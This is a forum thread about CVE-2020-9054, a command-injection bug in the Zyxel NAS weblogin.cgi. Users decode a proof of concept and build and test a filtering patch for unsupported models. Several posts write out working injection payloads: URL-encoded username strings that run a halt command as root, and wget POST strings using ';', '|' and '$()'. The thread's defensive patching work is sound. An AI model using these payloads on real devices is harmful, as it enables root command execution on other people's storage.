0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Benutzeravatar
shv
Beiträge: 60
Registriert: Sa 10. Nov 2018, 17:36

0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von shv »


Mijzelf
Beiträge: 92
Registriert: Mi 14. Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9

Beitrag von Mijzelf »

Here a proof of concept can be found, which turns off your NAS, if it's vulnerable.

When looking at the javascript, it actually tries to access this 3 pages:

Code: Alles auswählen

http://' + ip + '/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Becho%20/usr/local/apache/web_framework/%5C%5C%3E%20%2Ftmp%2F1.sh+%23&password=asdf'
http://' + ip + '/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Becho%20bin/executer_su%20/sbin/halt%3E%3E%20%2Ftmp%2F1.sh+%23&password=asdf'
http://' + ip + '/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bsh%20/tmp/1.sh+%23&password=asdf'
As you can see, directly after the username 'admin' some url encoded data is injected, which translates to

Code: Alles auswählen

';echo /usr/local/apache/web_framework/\\> /tmp/1.sh+#
';echo bin/executer_su /sbin/halt >> /tmp/1.sh+#
';sh /tmp/1.sh+#
When I assume that the leading '; and trailing +# are discarded, this creates a file /tmp/1.sh, which contains

Code: Alles auswählen

/usr/local/apache/web_framework/bin/executer_su /sbin/halt
and executes that using 'sh'.

As weblogin.cgi is a cgi binary, I think it should be possible to patch it on the NASses which are not longer supported by ZyXEL. (NSA325v2 and older). The webserver puts the url stuff in environment variables, and executes the binary. So when another binary (or script) is bindmounted on weblogin.cgi, it can filter the username before it executes the original weblogin.cgi.

(BTW, isn't it nice that there is a binary executer_su which executes everything as root?)

Mijzelf
Beiträge: 92
Registriert: Mi 14. Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9

Beitrag von Mijzelf »

Succeeded!

I have added a patch in Tweaks, which filters weblogin.cgi. It works on my NAS520 and NSA325. In both cases the PoC script can shutdown the boxes when the patch is not active, and it can't when the patch is active. (BTW, there is a bug in the PoC script. It erroneously claims my NSA325 is down, while it isn't. It tries to load an image which isn't available on fw4.)
The filter removes all '%' from both username and password. So if you are using special characters, which have to be encoded in th url, it doesn't work. Change your password before enabling the patch.

For the moment I have only uploaded it for fw4, as ZyXEL has patches for fw5.

Rincewind2020
Beiträge: 2
Registriert: Mi 26. Feb 2020, 22:37

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von Rincewind2020 »

Thanks: successfully tested for NSA325v2 - working.
Why is Zyxel not able or not willing to fix own mistakes?

Mijzelf
Beiträge: 92
Registriert: Mi 14. Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von Mijzelf »

Rincewind2020 hat geschrieben:
Mo 2. Mär 2020, 09:52
Thanks: successfully tested for NSA325v2 - working.
You're welcome. Thanks for the feedback.
Why is Zyxel not able or not willing to fix own mistakes?
Is that a question? Because those boxes are end-of-support. I admit that support is a bit short by ZyXEL, but on the other hand the prices are a lot lower than similar boxes of -for instance- Synology. Which leaves you with a box which is, in terms of hardware, still perfectly healthy, but which software is hardly sufficient anymore.

Mijzelf
Beiträge: 92
Registriert: Mi 14. Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von Mijzelf »

Cheered to early. The patch filters out all url encoded characters. But in case of a POST no encoding is necessary. The command

Code: Alles auswählen

wget http://nas520.lan/adv,/cgi-bin/weblogin.cgi --post-data="username=a';touch /tmp/x+#&password=x"
or

Code: Alles auswählen

wget http://nas520.lan/adv,/cgi-bin/weblogin.cgi --post-data="username=a'; | touch /tmp/x+#&password=x"
created a file /tmp/x on my patched nas.

So I've updated the patch, in case of a POST it also filters all ; and | away. Don't know if other characters can be used for the injection either. I have tried &, &&, but these are used as parameter seperator, and are for that reason filtered away by weblogin.cgi itself.

If someone can find another way to trigger the bug, please let me know.

Rincewind2020
Beiträge: 2
Registriert: Mi 26. Feb 2020, 22:37

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von Rincewind2020 »

Thx for the update!

norm
Beiträge: 1
Registriert: Do 5. Mär 2020, 19:34

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von norm »

Thanks for the patch and thanks for the update. Good work :D

Kuki
Beiträge: 28
Registriert: Mo 6. Jan 2020, 14:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von Kuki »

Zyxel offers now updated firmwares for patching:

Affected model Standard firmware version
NAS326 Available now. Firmware V5.21(AAZF.7)C0
NAS520 Available now. Firmware V5.21(AASZ.3)C0
NAS540 Available now. Firmware V5.21(AATB.4)C0
NAS542 Available now. Firmware V5.21(ABAG.4)C0


Not for older models:

Affected models that are end-of-support Workaround
NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2 Do not leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Mijzelf
Beiträge: 92
Registriert: Mi 14. Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Beitrag von Mijzelf »

... and yet another update. The command

Code: Alles auswählen

wget http://nas520.lan/adv,/cgi-bin/weblogin.cgi --post-data="username=a'>\$(touch /tmp/x)+#&password=x"
also triggered the bug. So I also filtered away the $.

BTW, on homeforum.zyxel.com you can find two people who have got ransomware on their nas, probably (or hopefully) by this vulnerability.

Antworten